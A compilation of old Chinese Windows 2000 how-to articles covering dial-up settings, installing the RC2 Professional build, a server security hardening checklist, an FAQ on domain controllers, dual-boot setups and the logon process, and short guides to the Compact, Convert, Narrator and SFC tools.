”→“属性”，选“高级”页面，按“更改默认首选项”按钮，将“数据连接首选项”中的“压缩”改为“已停用”。）3．“为单链路连接协商多重链接”——指定是否为单链路连接启用多链路协商，如果访问的远程服务器支持，它能提高传输的音频质量。

接下来返回到“网络”页，在“此连接使用下列选定的组件”多选框中只选中“Internet协议（TCP／IP）”。如果您在新建拨号连接时没有设置DNS（Internet域名解析服务器地址）的话，此时您可以在“Internet协议（TCP／IP）”属性中设置首选和备用DNS服务器地址（这个地址是由为您提供Internet接入服务的ISP提供的）。作为一个技巧您甚至可以使用其他Internet上的任何DNS服务器地址。例如：在首选DNS中输入您当地ISP提供给您的地址，在备用DNS中输入来自于其他ISP的DNS地址（该服务器的物理位置离您越近越好）。这样做的好处是：当您的DNS服务器出故障无法解析您请求的域名时，其他工作正常的DNS会帮您解析。要获得其他DNS服务器的IP地址或许您的网友帮得上这个忙。

在这个属性对话框下还有一个“高级”按钮，我们还需要进行一些高级TCP／IP设置：在“常规”页下保持选中“在远程网络上使用默认网关”，这是因为当建立拨号时，Win2K将您的ISP服务器作为新的默认路由添加到IP路由选择表中，这样ISP就成为默认网关，而不是本地局域网中的路由器。这样使您能够顺利地访问Internet上的资源。接着选中“使用IP头压缩”，它通过使用Van Jacobson TCP/IP数据包头压缩技术，增大成功访问远程服务器的能力。在“WINS”页下，不选中“启用LMHOSTS查询”，因为它是为NetBIOS（即网络基本输入输出系统，是一种在局域网中使用的应用程序编程接口）准备的.

返回


Win2000专业版安装指南

《一键清理系统垃圾》

Win2000专业版安装指南

    继Windows 2000 Beta3和RC1版之后，微软在9月15日又发布了Windows 2000 RC2（Release Candidate 2）即Windows 2000候选测试第2版，这有可能是Windows 2000在99年正式上市之前发布的最后一个测试版。

    我们在获得这个最新的Windows 2000 RC2之后，立即对它进行了安装试用，因Windows 2000 Professional对广大用户更具有普遍性，下面的介绍我们将以它为例。

    一、秣马厉兵

    Windows 2000 Professional的安装前期准备工作一定要做好，否则很难顺利地安装成功，这都是我们在多次失败后总结出来的，不妨仔细看看哟。

    1．硬件配置
    须要说明的是，虽然我们在Windows 2000 Professional的安装说明中看到系统的最低配置只需要32MB内存，但实际上我们在另一台K2-350、32MB的机器上安装Windows 2000 Professional RC2并运行之后，发现32MB对于Windows 2000 Professional而言，实在是难以忍受，除非你想体会在486上跑Win95的滋味。

    2．操作系统
    我们的硬盘原来已经安装了Windows 98简体中文第二版，因为Windows 2000不能从Windows 98第二版直接升级，所以我们采用Windows 2000 Professional与Windows 98简体中文版同时存在的双重启动安装。

    设置双重启动安装必须让Windows 2000 Professional与原操作系统分别安装在不同的磁盘分区，所以我们将硬盘的D分区清空，留出了2.8GB的空间供Windows 2000 Professional安装使用，我们推荐大家采取类似的措施--即清空一个磁盘分区来安装新的操作系统。建议安装Windows 2000 Professional的分区要大于1GB,因为安装该操作系统本身就至少需要500～650MB左右的空间（视组件多少而定），而安装完成后一般还有一些系统工具和其他应用程序需要更多的硬盘空间。注意，如果希望在Windows 2000中访问压缩的硬盘分区，必须对所有压缩的硬盘分区先解压，否则访问不会成功。

    如果你已经安装了Windows 2000 Professional早期版本如Beta3版等，在安装时可以选择直接升级（Update）。

    3．硬件兼容
    从理论上来说，Windows 2000 Professional对硬件的兼容性应该比Win98要好，但是在Windows 2000 Professional的安装说明中，微软还是特意强调用户查对一下自己的硬件是否被Windows 2000 Professional支持。所有Windows 2000支持的硬件列表都注明在Hcl.txt说明文件里，你可以在Windows 2000光盘的Support文件夹下找到这个文件。最新的硬件兼容说明文件可以在网上找到，网址是http://www.microsoft.com/hwtest/hcl.htm。

    Windows 2000 Professional在安装说明中强调，硬件说明表中没有的硬件，Windows 2000基本上是不支持的。不过我们发现实际情况要好得多，例如我们的源兴LTN-362光驱在Hcl.txt文件找不到，但在安装检测时没有丝毫问题。
    好了，一切准备就绪，我们出征吧。

    二、安装小记

    1．DOS下安装
如果你希望在Windows 95/98下直接安装Windows 2000 Professinal，可略过这一节，直接参看下一节"Windows下安装"。

    在DOS下安装Windows 2000 Professinal也可分两种情况:软盘启动和光盘启动。
    一般情况下，Windows 2000 Professinal都可以自动进入光盘启动，如果你的主板和CMOS不支持光盘自启动，就只能用软盘启动来安装了。

    这里须要注意的是:在启动软盘中要拷进HIMEM.SYS和SMARTDRV.EXE文件，且要在Config.sys文件中加入device=SMARTDRV.EXE语句（安装时一定要启动SMARTDRV后台缓冲，否则安装过程会让你欲哭无泪）。

    安装程序首先会将140多兆的程序从光盘拷贝到硬盘，这是下一步运行安装向导所需要的程序文件，耗时大约六分种。文件拷贝完毕之后，将软盘取出，由硬盘直接启动，进入安装程序的第二步:文本导引安装。文本导引安装主要是完成Windows 2000 Professional文件格式的选择（FAT、FAT32或NTFS格式）和基本的系统文件拷贝，此后安装由系统自行完成。

    2．Windows下安装

    如果你选择在Windows 95/98下直接安装Windows 2000 Professinal，可以在当前操作系统下直接进入安装向导。相对于DOS下的安装界面，这要直观简便得多。
  Windows 2000 Professional提供两种安装模式:重新安装和升级安装。
  如果你所使用的是英文Windows 95/98或Windows NT 3.51/4.0 Workstation版，或者已经安装了Windows 2000 Professional Beta 3/RC1等早期版本，都可以直接在Windows平台下升级，这样可以很好地保留当前系统的设置。

    不过，Windows 2000 Professional RC2不支持直接从中文版的Windows 9X/NT升级到Windows 2000，所以一般情况下用户都须要选择重新安装。

    将Windows 2000 Professinal光盘插入光驱后，安装向导将首先对当前操作系统进行检测，发现当前操作系统不支持升级，即警告并提示用户Windows 2000将重新安装系统。

    然后安装向导提示用户选择安装选项。首先可选择系统语言，在上面的选择栏中选择系统主语言（Main Lan-guage）,我们当然选择Chinese (PRC);在下面的选择栏中选择附加语言即你将来可能用到的语言，按住Ctrl键点击鼠标，可以多重选择，将来Windows 2000 Professional就可以支持这些语种的应用程序了。以前我们玩的日文游戏大多需要日文Windows支持，让我们不得不在机器里再装一个平时很少使用的日文系统，在Windows 2000中，这个问题得到了较好的解决。

    选择好语言之后，一定要进入"高级选项"（Advanced Options）进行设置。要建立双重启动配置，须要让Windows 2000 Profession安装在与当前操作系统不同的磁盘分区内，一般情况下我们的操作系统都安装在C盘，所以默认状态下Windows 2000 Professinal安装程序也会把系统安装到C盘下。必须在"高级选项"中设置允许自定义Windows 2000的安装分区。如果希望通过网络安装或者硬盘安装，也必须在"高级选项"中自定义Windows 2000的安装文件位置。另外，还可以选择将所有安装文件在安装Windows 2000的同时拷贝到硬盘中去，这样便于以后的安装升级。

    如果希望你的Windows 2000安装多一些色彩，可以进到"易用选项"（Accessibility Options），对眼睛不太好的朋友，可选择"放大镜"（Magnifier）放大安装过程中的提示信息，或选择"讲解员"（Narrator）来一路为你讲解安装信息，特别指出这是为盲人提供的，当然普通人一样可以享受，说明微软考虑得相当细致。

    3．系统设置

    安装设置完成后，安装向导将对机器和系统进行自检，包括:CPU、主板、硬盘剩余空间和文件系统以及内存大小等等。如果自检不能通过，则安装向导会报错并终止安装，自检通过之后，就可以进入我们熟悉的安装界面了。因为一般的设置大家都很熟悉，我们这里只对一些重要设置作出说明。

    --是否选择升级到Windows 2000的NTFS-5文件系统

    如果要建立双重启动配置，建议使用FAT/FAT32的文件系统，虽然Windows 2000的NTFS-5文件系统具有更高效更安全等特点，但是Windows 9X和较早版本的Windows NT都与Windows 2000的NTFS-5文件系统不兼容。

    --设置管理员（Administrator）帐号

    在安装过程中将创建一个管理员（Administrator）帐号。熟悉Windows NT的用户都知道这个管理员是干什么用的，而从未接触过Windows NT的用户就可能有点犯难了。其实简单地说，拥有管理员（Administrator）帐号的用户是Windows 2000中权限最高的用户，只有管理员（Administrator）才可以对机器进行全面设置和管理、创建其他用户的帐号、限制其他用户的权限等。

    不管怎么样，管理员帐号和口令是非常重要的，一定要设置并记住。在Windows 2000 Profession安装成功第一次运行时，系统会提示输入用户名和口令。这时，你就可以输入"Administrator"帐号和口令，否则你会经常遇到系统提?quot;你不是该机管理员，无权更改该设置"，到时可别迷惑不解噢！注意，一旦你机器的Administrator帐号的口令遗失或被人更改，你就失去了对整个机器和系统的管理权力，要救回来可不容易。

    Windows 2000与Windows 9X的安全管理机制完全不同，也许你还需要一点时间来适应。

    --网络设置

    在安装中如果会有网络应用，则须要对网络进行设置，主要是设置"组"和"域"。

    如果几台计算机的"组"名称一样，那么这几台机器就是一个工作组。注意，凡是有网络应用则必须对"组"名进行设置。可以设置一个需要加入的已存在的"组"名，也可以设置一个新的"组"名。要加入"域"，则必须通过网络管理员获得这个"域"的一个帐号。如果在安装时没有"域"的帐号，可以先不加入"域"，在安装完成之后再通过Windows 2000的"网络向导"加入"域"。

    4．安装完成

    在程序拷贝完毕，安装向导结束后，你就可以看到Windows 2000的登录界面（如果是对Windows 2000升级，还可以直接使用以前的帐号和口令登录）。

    登录进入Windows 2000吧，安装完成了！

返回


Windows2000安全检查清单

《一键清理系统垃圾》

Windows2000安全检查清单

具体清单如下：
初级安全篇
1.物理安全
服务器应该安放在安装了监视器的隔离房间内，并且监视器要保留15天以上的摄像记录
。另外，机箱,键盘，电脑桌抽屉要上锁，以确保旁人即使进入房间也无法使用电脑，钥
匙要放在另外的安全的地方。
2.停掉Guest 帐号
在计算机管理的用户里面把guest帐号停用掉，任何时候都不允许guest帐号登陆系统。
为了保险起见，最好给guest 加一个复杂的密码，你可以打开记事本，在里面输入一串
包含特殊字符,数字，字母的长字符串，然后把它作为guest帐号的密码拷进去。
3．限制不必要的用户数量
去掉所有的duplicate user 帐户, 测试用帐户, 共享帐号，普通部门帐号等等。用户组
策略设置相应权限，并且经常检查系统的帐户，删除已经不在使用的帐户。这些帐户很
多时候都是黑客们入侵系统的突破口，系统的帐户越多，黑客们得到合法用户的权限可
能性一般也就越大。国内的nt/2000主机，如果系统帐户超过10个，一般都能找出一两个
弱口令帐户。我曾经发现一台主机197个帐户中竟然有180个帐号都是弱口令帐户。
4．创建2个管理员用帐号
虽然这点看上去和上面这点有些矛盾，但事实上是服从上面的规则的。 创建一个一般权
限帐号用来收信以及处理一些日常事物，另一个拥有Administrators 权限的帐户只在需
要的时候使用。可以让管理员使用 “ RunAS” 命令来执行一些需要特权才能作的一些
工作，以方便管理。
5．把系统administrator帐号改名
大家都知道，windows 2000 的administrator帐号是不能被停用的，这意味着别人可以
一遍又一边的尝试这个帐户的密码。把Administrator帐户改名可以有效的防止这一点。
当然，请不要使用Admin之类的名字，改了等于没改，尽量把它伪装成普通用户，比如改
成：guestone 。
6．创建一个陷阱帐号
什么是陷阱帐号? Look!>创建一个名为” Administrator”的本地帐户，把它的权限设
置成最低，什么事也干不了的那种，并且加上一个超过10位的超级复杂密码。这样可以
让那些 Scripts s忙上一段时间了，并且可以借此发现它们的入侵企图。或者在它的lo
gin scripts上面做点手脚。嘿嘿，够损！
7.把共享文件的权限从”everyone”组改成“授权用户”
“everyone” 在win2000中意味着任何有权进入你的网络的用户都能够获得这些共享资
料。任何时候都不要把共享文件的用户设置成”everyone”组。包括打印共享，默认的
属性就是”everyone”组的，一定不要忘了改。
8.使用安全密码
一个好的密码对于一个网络是非常重要的，但是它是最容易被忽略的。前面的所说的也
许已经可以说明这一点了。一些公司的管理员创建帐号的时候往往用公司名，计算机名
，或者一些别的一猜就到的东西做用户名，然后又把这些帐户的密码设置得N简单，比如
“welcome” “iloveyou” “letmein”或者和用户名相同等等。这样的帐户应该要求
用户首此登陆的时候更改成复杂的密码，还要注意经常更改密码。前些天在IRC和人讨论
这一问题的时候，我们给好密码下了个定义：安全期内无法破解出来的密码就是好密码
，也就是说，如果人家得到了你的密码文档，必须花43天或者更长的时间才能破解出来
，而你的密码策略是42天必须改密码。
9.设置屏幕保护密码
很简单也很有必要，设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。注意
不要使用OpenGL和一些复杂的屏幕保护程序，浪费系统资源，让他黑屏就可以了。还有
一点，所有系统用户所使用的机器也最好加上屏幕保护密码。
10． 使用NTFS格式分区
把服务器的所有分区都改成NTFS格式。NTFS文件系统要比FAT,FAT32的文件系统安全得多
。这点不必多说，想必大家得服务器都已经是NTFS的了。
11．运行防毒软件
我见过的Win2000/Nt服务器从来没有见到有安装了防毒软件的，其实这一点非常重要。
一些好的杀毒软件不仅能杀掉一些著名的病毒，还能查杀大量木马和后门程序。这样的
话，“黑客”们使用的那些有名的木马就毫无用武之地了。不要忘了经常升级病毒库
12．保障备份盘的安全
一旦系统资料被破坏，备份盘将是你恢复资料的唯一途径。备份完资料后，把备份盘防
在安全的地方。千万别把资料备份在同一台服务器上，那样的话，还不如不要备份。
中级安全篇：
1．利用win2000的安全配置工具来配置策略
微软提供了一套的基于MMC(管理控制台)安全配置和分析工具，利用他们你可以很方便的
配置你的服务器以满足你的要求。具体内容请参考微软主页：
http://www.microsoft.com/windows2000/techinfo/howitworks/security/sctoolset.
asp
2．关闭不必要的服务
windows 2000 的 Terminal Services（终端服务），IIS ,和RAS都可能给你的系统带来
安全漏洞。为了能够在远程方便的管理服务器，很多机器的终端服务都是开着的，如果
你的也开了，要确认你已经正确的配置了终端服务。有些恶意的程序也能以服务方式悄
悄的运行。要留意服务器上面开启的所有服务，中期性(每天)的检查他们。下面是C2级
别安装的默认服务：
Computer Browser service TCP/IP NetBIOS Helper
Microsoft DNS server Spooler
NTLM SSP Server
RPC Locator WINS
RPC service Workstation
Netlogon Event log
3．关闭不必要的端口
关闭端口意味着减少功能，在安全和功能上面需要你作一点决策。如果服务器安装在防
火墙的后面，冒的险就会少些，但是，永远不要认为你可以高枕无忧了。用端口扫描器
扫描系统所开放的端口，确定开放了哪些服务是黑客入侵你的系统的第一步。\system3
2\drivers\etc\services 文件中有知名端口和服务的对照表可供参考。具体方法为：
网上邻居>属性>本地连接>属性>internet 协议(tcp/ip)>属性>高级>选项>tcp/ip筛选>
属性 打开tcp/ip筛选，添加需要的tcp,udp,协议即可。
4．打开审核策略
开启安全审核是win2000最基本的入侵检测方法。当有人尝试对你的系统进行某些方式（
如尝试用户密码,改变帐户策略，未经许可的文件访问等等）入侵的时候，都会被安全审
核记录下来。很多的管理员在系统被入侵了几个月都不知道，直到系统遭到破坏。下面
的这些审核是必须开启的，其他的可以根据需要增加：
策略 设置
审核系统登陆事件 成功，失败
审核帐户管理 成功，失败
审核登陆事件 成功，失败
审核对象访问 成功
审核策略更改 成功，失败
审核特权使用 成功，失败
审核系统事件 成功，失败
5.开启密码密码策略
策略 设置
密码复杂性要求 启用
密码长度最小值 6位
强制密码历史 5 次
强制密码历史 42 天
6．开启帐户策略
策略 设置
复位帐户锁定计数器 20分钟
帐户锁定时间 20分钟
帐户锁定阈值 3次
7．设定安全记录的访问权限
安全记录在默认情况下是没有保护的，把他设置成只有Administrator和系统帐户才有权
访问。
8．把敏感文件存放在另外的文件服务器中
虽然现在服务器的硬盘容量都很大，但是你还是应该考虑是否有必要把一些重要的用户
数据(文件，数据表，项目文件等)存放在另外一个安全的服务器中，并且经常备份它们
。
9.不让系统显示上次登陆的用户名
默认情况下，终端服务接入服务器时，登陆对话框中会显示上次登陆的帐户明，本地的
登陆对话框也是一样。这使得别人可以很容易的得到系统的一些用户名，进而作密码猜
测。修改注册表可以不让对话框里显示上次登陆的用户名，具体是：
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DontDisplayLastUs
erName
把 REG_SZ 的键值改成 1 .
10．禁止建立空连接
默认情况下，任何用户通过通过空连接连上服务器，进而枚举出帐号，猜测密码。我们
可以通过修改注册表来禁止建立空连接：
Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成
”1”即可。
10.到微软网站下载最新的补丁程序
很多网络管理员没有访问安全站点的习惯，以至于一些漏洞都出了很久了，还放着服务
器的漏洞不补给人家当靶子用。谁也不敢保证数百万行以上代码的2000不出一点安全漏
洞，经常访问微软和一些安全站点，下载最新的service pack和漏洞补丁，是保障服务
器长久安全的唯一方法。
高级篇
1. 关闭 DirectDraw
这是C2级安全标准对视频卡和内存的要求。关闭DirectDraw可能对一些需要用到Direct
X的程序有影响（比如游戏，在服务器上玩星际争霸？我晕..$%$^%^&??），但是对于绝
大多数的商业站点都应该是没有影响的。 修改注册表 HKLM\SYSTEM\CurrentControlSe
t\Control\GraphicsDrivers\DCI 的Timeout(REG_DWORD)为 0 即可。
2.关闭默认共享

win2000安装好以后，系统会创建一些隐藏的共享，你可以在cmd下打 net share 查看他

们。网上有很多关于IPC入侵的文章，相信大家一定对它不陌生。要禁止这些共享 ，打
开 管理工具>计算机管理>共享文件夹>共享 在相应的共享文件夹上按右键，点停止共享
即可，不过机器重新启动后，这些共享又会重新开启的。
默认共享目录 路径和功能
C$ D$ E$ 每个分区的根目录。Win2000 Pro版中，只有Administrator
和Backup Operators组成员才可连接，Win2000 Server版本
Server Operatros组也可以连接到这些共享目录
ADMIN$ %SYSTEMROOT% 远程管理用的共享目录。它的路径永远都
指向Win2000的安装路径，比如 c:\winnt
FAX$ 在Win2000 Server中，FAX$在fax客户端发传真的时候会到。
IPC$ 空连接。IPC$共享提供了登录到系统的能力。
NetLogon 这个共享在Windows 2000 服务器的Net Login 服务在处
理登陆域请求时用到
PRINT$ %SYSTEMROOT%\SYSTEM32\SPOOL\DRIVERS 用户远程管理打印机

3.禁止dump file的产生
dump文件在系统崩溃和蓝屏的时候是一份很有用的查找问题的资料(不然我就照字面意思
翻译成垃圾文件了)。然而，它也能够给黑客提供一些敏感信息比如一些应用程序的密码
等。要禁止它，打开 控制面板>系统属性>高级>启动和故障恢复 把 写入调试信息 改成
无。要用的时候，可以再重新打开它。
4.使用文件加密系统EFS
Windows2000 强大的加密系统能够给磁盘，文件夹，文件加上一层安全保护。这样可以
防止别人把你的硬盘挂到别的机器上以读出里面的数据。记住要给文件夹也使用EFS,而
不仅仅是单个的文件。 有关EFS的具体信息可以查看
http://www.microsoft.com/windows2000/techinfo/howitworks/security/encrypt.as
p
5.加密temp文件夹
一些应用程序在安装和升级的时候，会把一些东西拷贝到temp文件夹，但是当程序升级
完毕或关闭的时候，它们并不会自己清除temp文件夹的内容。所以，给temp文件夹加密
可以给你的文件多一层保护。
6.锁住注册表
在windows2000中，只有administrators和Backup Operators才有从网络上访问注册表的
权限。如果你觉得还不够的话，可以进一步设定注册表访问权限，详细信息请参考：
http://support.microsoft.com/support/kb/articles/Q153/1/83.asp
7.关机时清除掉页面文件
页面文件也就是调度文件，是win2000用来存储没有装入内存的程序和数据文件部分的隐
藏文件。一些第三方的程序可以把一些没有的加密的密码存在内存中，页面文件中也可
能含有另外一些敏感的资料。 要在关机的时候清楚页面文件，可以编辑注册表
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
把ClearPageFileAtShutdown的值设置成1。
8.禁止从软盘和CD Rom启动系统
一些第三方的工具能通过引导系统来绕过原有的安全机制。如果你的服务器对安全要求
非常高，可以考虑使用可移动软盘和光驱。把机箱锁起来扔不失为一个好方法。
9.考虑使用智能卡来代替密码
对于密码，总是使安全管理员进退两难，容易受到 10phtcrack 等工具的攻击，如果密
码太复杂，用户把为了记住密码，会把密码到处乱写。如果条件允许，用智能卡来代替
复杂的密码是一个很好的解决方法。
10.考虑使用IPSec
正如其名字的含义，IPSec 提供 IP 数据包的安全性。IPSec 提供身份验证、完整性和
可选择的机密性。发送方计算机在传输之前加密数据，而接收方计算机在收到数据之后
解密数据。利用IPSec可以使得系统的安全性能大大增强。有关IPSes的详细信息可以参
考： http://www.microsoft.com/china/technet/security/ipsecloc.asp


Windows2000常见问题解答

《一键清理系统垃圾》

Windows2000常见问题解答

任务管理器与AT命令的区别?
在以前的Window版本中，你也许使用过AT命令。它可以用来将一个命令， 脚本或是程序安排在某一特定的日期和时间运行。在Windows2000中有了一个叫做任务管理器的图形化工具具有比AT命令更为强大的功能。

任务管理器与AT命令不完全相同，但两者可以协同工作。当你用AT命令安排了一项任务，该任务将出现在任务管理器的窗口中。你仍可以用AT 命令来安排自动运行任务。

你可以用任务管理器指定运行任务的用户，而这些任务可以是AT命令生成的。另外，你也可以用任务管理器修改任何用AT命令生成的任务。但是一旦如此，你便不能再用AT命令修改这些任务了。

用任务管理器生成的任务被存储在Winnt\tasks目录下, 扩展名为 .job。 这将使你能够在计算机之间转移任务。

怎样使用微软管理控制台(MMC)快照?
微软管理控制台包含有许多管理工具， 你可以用它们来管理你的计算机， 服务， 系统的组件及网络。 你可以从控制台增加或是删除这些叫做快照的工具， 具体的步骤如下：

在于"运行"对话框中键入 "MMC"，进入管理控制台
在控制台菜单中，单击 添加/删除 快照
在"增加单独的快照"对话框中，选择你想添加的快照，单击"添加"
如你想增加别的 "快照"，重复步骤 2-4
怎样安装域控制器?

选择启动菜单中的管理工具， 单击"设置你的服务器"
选择活动目录， 单击"开始" 启动活动目录安装向导
根据活动目录安装向导的提示操作
如你想直接启动活动目录安装向导， 可直接在 "运行"对话框中键入"dcpromo"
因为Windows Professional 不能成为域控制器 ，因而在Windows Professional上没有"设置你的服务器" 选项及"dcpromo"命令

在你使用 "活动目录安装向导"前， 先考虑一下几点：

取得建立一个域的信息， 包括：用户登录名， 密码，域名。 该用户权账号必须具有足够的权限来创建一个新的域控制器
你所需要的域控制器的类型：创建一个新域的域控制器还是为以有的域另增加一个新的域控制器。 如你准备新生成一个域， 你必须决定是生成一个新的树还是加入一个已有的树。
怎样取消一个域控制器?

直接在"运行" 对话框中键入"depromo"
根据活动目录安装向导的提示操作
注意：

如果该域控制器含域的目录，在取消改域控制器之前先确认一下是否有另外的域控制器对用户可见。
如果该域控制器正负责一些主操作， 将这些操作转移到其他的域控制器上去。
如果该域含有子域， 它不能被删除。 如果该域控制器是某一个育种最后一台域控制器， 删除它意味着将整个域删除。 同理对树叶成立。
如何使Windows 95/98,Windows NT及Win2000并存在同一台机器上？
若要让Windows95/98, Windows NT及Win2000同时可以在一台机器上安装，必须先考虑文件格式为FAT16, FAT32或NTFS：

第一种情况：Win95/98与Win2000并存
引导分区的文件格式必须为FAT16或FAT32，不可为NTFS；原因是Win95/98不识别NTFS文件格式
安装顺序为先装Win95/98再直接从Win95/98系统下执行Win2000的安装程序,则自动会形成双重开机的开机画面
第二种情况：Windows NT与Win2000并存
引导分区的文件格式必须为FAT16或NTFS，不可为FAT32；原因是Windows NT不认识FAT32的文件格式
安装顺序为先装Windows NT再直接从Windows NT系统下执行Win2000的安装程序，则自动会形成双引导开机画面 (请注意Windows NT必需先升级到Service Pack 4以上的版本才可以)
第三种情况：Windows 95/98, Windows NT及Win2000同时存在
引导分区的文件格式必须为FAT16, 不得为FAT32及NTFS；原因为Win95/98不认得NTFS,而Windows NT不认得FAT32
安装顺序为先装Win95/98再直接从Win95/98系统下执行Windows NT安装程式，装好Windows NT后请升级至SP4以上的版本，之后再到Windows NT系统下执行Win2000的安装程式，则自动会形成三重开机的开机画面
(请注意在安装Win2000时不要选择升级到NTFS的文件格式)

安装Windows 2000 以后, 如何安装Windows NT4.0?
安装前必须先备份一些文件：Boot.ini, Ntboodd.sys
从 Windows NT Service Pack 4(或更新版本)取得Support\Winnt32 文件夹内更新的 Winnt32.exe，可以让您在已经执行Windows 2000 的电脑安装 Windows NT 4.0。

更新 Winnt32.exe

从 Windows NT Service Pack 4 取得 Winnt32.exe 文件，然后将文件拷贝到硬盘，或者双击 Service Pack 4 CD-ROM上的这个文件。Winnt32.exe 文件是放在 Support\Winnt32 文件夹内。
当提示您提供 Windows NT 4.0 安装文件的位置时，请将路径指向Windows NT 4.0 CD-ROM 的 \I386 或 \Alpha 资料夹。
安装 Windows NT 4.0 之后

安装Service Pack 4(或更新版本，即您安装Service Pack最新的版本)。
从Windows 2000 CD将 NTLDR 和 NTDETECT.COM 拷贝到系统的根目录。
注意事项: 要使用此安装方式，您安装的分区必须包含 FAT分区 。

什么是Windows 2000 活动目录服务?
Windows 2000 活动目录服务由目录和服务两部分组成：

所谓目录, 是指各种对象的物理上的存储容器. 电话簿就是一个目录的例子. 它包含了电话号码和地址等信息.
所谓服务, 是指如何让存储在目录里的信息可以被使用. 例如,如果有一个应用程序能够帮助你查找到电话簿里的信息, 这个应用程序就是一个服务的例子.
在Windows 2000中,我们这种目录服务为活动目录服务，活动目录是一个分布式目录. 信息被存储在不同的机器上, 这就允许快速的访问和容错. Windows 2000活动目录与其他操作系统有很好的互操作性. 它支持Lightweigh Directory Access Protocol (LDAP), version 2 and 3. 这就允许Windows 2000活动目录与其他支持LDAP的目录服务互操作.

Windows 2000 本地登陆过程
当你从Windows 2000 Professional or Server登录时,意见Windows 2000 用两种过程验证本地登录. Windows 2000尝试使用 Kerberos 作为基本验证方式. 如果找不道 Key Distribution Center (KDC) 服务, Windows 会使用Windows NT LanManager(NTLM) 安全机制来验证在本地SAM 中的用户

本地登录验证过程如下:

你输入用户名及密码然后按回车键. Graphical Identification and Authentication (GINA) 会收集这些信息.
GINA 传送这些安全信息给Local Security Authority (LSA) 来进行验证.
The LSA 传送这些信息给Security Support Provider Interface (SSPI). SSPI 是一个与Kerberos 和 NTLM通讯的接口 服务.
SSPI 传送用户名及密码给Kerberos SSP. Kerberos SSP 检查 目的机器是本机还是域名. 如果是本机, Kerberos 返回错误消息给 SSPI. 如果找不到KDC, 机器生成一个用户不可见的内部错误.
这个内部错误促发 SSPI 通知GINA. GINA 再次传送这些安全信息给LSA. LSA 再次传送这些安全信息给SSPI.
这次, SSPI 传送用户名及密码给NTLM driver MSV1-0 SSP. NTLM driver 用Netlogon 服务和本地SAM来验证用户.
如果NTLM和Kerberos都不能验证你的帐号, 你会收到下列错误消息提示您输入正确的用户名和密码.
如何安装SCSI 控制卡驱动程序，以使用SCSI 硬盘装WIN2000 ？
当启动Windows2000安装程式时,屏幕下面状态列会提示您按下[F6]键，即可设定SCSI卡驱动程序，若您的SCSI卡型号未列出，请放入驱动程式软盘进行安装。

如何排除由于主机板ACPI不相容所造成无法安装WIN2000的问题？
当您安装windows 2000时发生蓝底白字"The ACPI Bios in this system is not fully compliant with the ACPI specification...",重新开机,按下F7就可离开ACPI MODE SETUP,到TEXT MODE SETUP就可以继续安装windows 2000.

如果您担心会有规格不符的状况,也可以在windows 2000安装时按F5,会出现四个选项,若您没有厂商提供的驱动程式,请选择standard pc完成windows 2000安装.

安装后系统中文部分出现乱码？
这是由于您在安装过程中将地区设定为"China(PRC)"以外的国别设定。解决办法为：进入控制台--地区选项--设定为"China（PRC）"，并重新启动电脑。

当您尝试使用Win2000光盘开机去安装Windows2000时，系统出现下列讯息：
Setup cannot load the keyboard layout file Kbdus.dll.
Setup cannot continue. Shut down or restart you computer
按如下步骤解决：

硬盘分区超过了24个分区。
解决方法：
如果在您电脑中有一个以上的硬盘，请关闭其电源。
如果您电脑中只有一个硬盘，请重新划分分区，并少于24个分区。

返回


Windows2000实用工具四则

《一键清理系统垃圾》

Windows2000实用工具四则

一、文件压缩工具Compact

    这个压缩工具其实上在Windows NT 4.0中就已经具备。而在Windows 2000下，它变得更加好用。

    要想使用这个功能，用户当前的硬盘分区必须是NTFS格式。因为压缩功能是建立在操作系统一级的，对我们存取文件没有影响。同样，由于内置NTFS分区，因此你完全可以对指定的一个文件、多个文件，或者是一个指定的文件夹进行压缩。

    如果用户想在图形模式下使用这个功能，你可以选择本地硬盘的一个NTFS格式分区，用鼠标右键单击其中的一个目录或者是一个文件。然后选择“属性”，在“常规”标签内，可以看到“压缩硬盘以节省硬盘空间”的选项。在该选项上打勾即可。

    另外，在命令行方式下如何利用Compact来达到压缩文件的目的呢?

    Compact的命令行和参数如下：
    COMPACT [/C | /U] [/S[:dir]] [/A] [/I] [/F] [/Q] [filename [...]]
    /C：压缩指定的文件。将标示目录使以后新增的文件将被压缩。
    /U：解压缩指定的文件。将标示目录使以后新增的文件将不被解压缩。
    /S：对所给目录及其所有子目录下的文件执行指定的操作。程序预设“dir”为目前的目录。
    /A：显示有隐藏或系统属性的文件，这些文件在预设中是被省略的。
    /I：即使发生错误，仍继续执行指定的操作。Compact预设模式是遇到错误将停止操作。
    /F：强迫压缩所有指定的文件(即使是已经压缩过的文件)。预设模式是略过已压缩的文件。
    /Q：只报告最基本的信息。
    filename：指定一种格式、文件、或文件夹。
    不带参数：COMPACT显示当前文件夹及其包含的所有文件的压缩状态。你可以使用多个文件名或通配字符。使用多个参数时相互之间必须有空格。

    现在，如果你要对“files”文件夹下的所有文件（包含子目录）进行压缩工作的话，只需键入指令“Compact files /c /s”即可，非常容易。

    而如果你想将它们全部解压缩的话，也只要键入指令“Compact files /u /s”就完成了。其他的选项使 用起来也很方便。

二、转换工具Convert

    如果你想把一个FAT格式的硬盘分区转换为NTFS格式，就需要Convert。
    我们知道，在Win 95 OSR2以后的版本，都可以将FAT分区转换为FAT32分区。Convert正是起类似作用，只不过它转换成NTFS而不是FAT32而已。
    使用Convert很简单，例如，我们想将FAT格式的D分区转为NTFS格式，只要键入：Convert D: /FS:NTFS即可。如果目前硬盘分区无法锁定，那么这个工作会在再次启动Windows 2000时完成。之后你的D盘就会变成NTFS分区。
    需要注意的是，Convert工具无法将NTFS分区转成FAT分区，因此大家使用时一定要小心。

    三、朗读程序Narrator

    Windows 2000提供一个名为“朗读程序”的应用程序。“朗读程序”是一个将文字转换为语音的公用程序，可用于盲人或视力不佳的使用者。“朗读程序”可以读出萤幕上显示的内容：活动视窗、菜单选项或键入的文字内容。
    “朗读程序”还可以与记事本、写字板、控制面板、Internet Explorer浏览器、Windows 2000桌面和Windows 2000安装程序一起工作。这个工具会为某类视力不佳的用户提供一种听觉上的辅助功能，方便使用者更好地操作电脑。

四、扫描工具SFC

    此工具会自动扫描所有受保护的系统文件，并用正确的版本取代不正确的版本。在操作系统部分损坏时，可以用来恢复系统。

    SFC的命令行及其各参数如下：
    SFC [/scannow] [/scanonce] [/scanboot] [/cancel] [/enable]
